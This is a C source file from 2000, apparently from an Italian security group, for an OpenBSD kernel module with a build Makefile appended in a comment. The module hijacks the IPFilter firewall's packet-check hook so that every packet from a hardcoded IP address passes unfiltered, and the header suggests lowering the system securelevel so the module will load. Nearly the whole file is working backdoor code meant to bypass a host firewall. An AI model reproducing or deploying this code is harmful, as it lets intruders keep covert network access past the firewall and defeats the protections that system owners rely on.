/*
 * Name: Filtering IpFilter ( OpenBSD Version + Makefile in append )
 * Date: May 23 04:06:37 2000
 * Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
 *
 * SoftProject Digital Security for Y2K
 * Sikurezza.org Italian Security Mailing List
 *
 * COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
 * Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
 *
 * Tested on: OpenBSD 2.6 kern#0 i386
 *
 * read ipfhack.c ( FreeBSD Version ) for information on how this works
 *
 * Note if you want to use this probably you have to modify securelevel...
 * (/etc/rc.securelevel) in order to load it in memory...
 *
 * Greetings to: Grace Slick - I love you ! :*
 * 		 Bob Dylan - Tomorrow is your birthday ... yeah!
 * 		 	     and for his tour in Italy :)
 * 
 */

#define GO_JOHNNY_GO	"192.168.1.3" 
/* packets sent by this ip will pass ! */

#include <sys/param.h>
#include <sys/systm.h>
#include <sys/conf.h>
#include <sys/exec.h>
#include <sys/lkm.h>
#include <sys/errno.h>

#include <sys/proc.h>

#include <sys/mbuf.h>
#include <sys/socket.h>
#include <sys/socketvar.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_var.h>


typedef	struct 	ip	ip_t;
typedef struct 	mbuf	mb_t;
typedef int	ipfr_t	__P((ip_t *, int, void *, int, mb_t **));

static	ipfr_t	myfr, *fr;
extern	ipfr_t	*fr_checkp;

static u_int32_t	inaton	__P((const char *));

static int
myfr(ip_t *ip, int hlen, void *ifp, int out, mb_t **mp)
{
	if(ip->ip_src.s_addr == inaton(GO_JOHNNY_GO))
		return 0;
	
	return(fr(ip, hlen, ifp, out, mp));
}

MOD_MISC("IpFil");

static int
IpFil_load(struct lkm_table *lkmtp, int cmd)
{
	if(cmd == LKM_E_LOAD) {
		int s = splnet();
		
		printf("Filtering iPFilter\n");
		printf("(c) Coffeeware - SoftProject Y2k\n");
		printf("pIGpEN / s0ftpj\n");
		fr = fr_checkp;
		fr_checkp = myfr;
		
		splx(s);
	}

	return 0;
}


static int
IpFil_unload(struct lkm_table *lkmtp, int cmd)
{
	if(cmd == LKM_E_UNLOAD) {
		int s = splnet();
		
		printf("iPFilter unloaded\n");
		fr_checkp = fr;

		splx(s);
	}

	return 0;
}


IpFil( lkmtp, cmd, ver)
struct lkm_table	*lkmtp;	
int			cmd;
int			ver;
{
	DISPATCH(lkmtp, cmd, ver, IpFil_load, IpFil_unload, lkm_nofunc);
}


static u_int32_t 
inaton(const char *str)
{
	unsigned long l;
	unsigned int val;
	int i;

	l = 0;

	for(i=0; i < 4; i++) {
		l <<= 8;
		if(*str != '\0') {
			val = 0;
			while(*str != '\0' && *str != '.') {
				val *= 10;
				val += *str - '0';
				str++;
			}
			l |= val;
			if(*str != '\0')
				str++;
		}
	}
	return(htonl(l));
}

/*
SRCS=obsd_ipfhack.c
OBJS=$(SRCS:.c=.o)

MODOBJ=IpFil.o

KMOD=IpFil
CFLAGS+= -D_KERNEL -I/sys

all:	$(MODOBJ)

clean:
	rm -f $(OBJS) $(KOBJS) $(MODOBJ) $(KMOD)

load:
	modload -o $(KMOD) -e$(KMOD) $(MODOBJ)

unload:
	modunload -n $(KMOD)

$(MODOBJ): $(OBJS) $(KOBJS)
	$(LD) -r -o $(MODOBJ) $(OBJS) $(KOBJS)
*/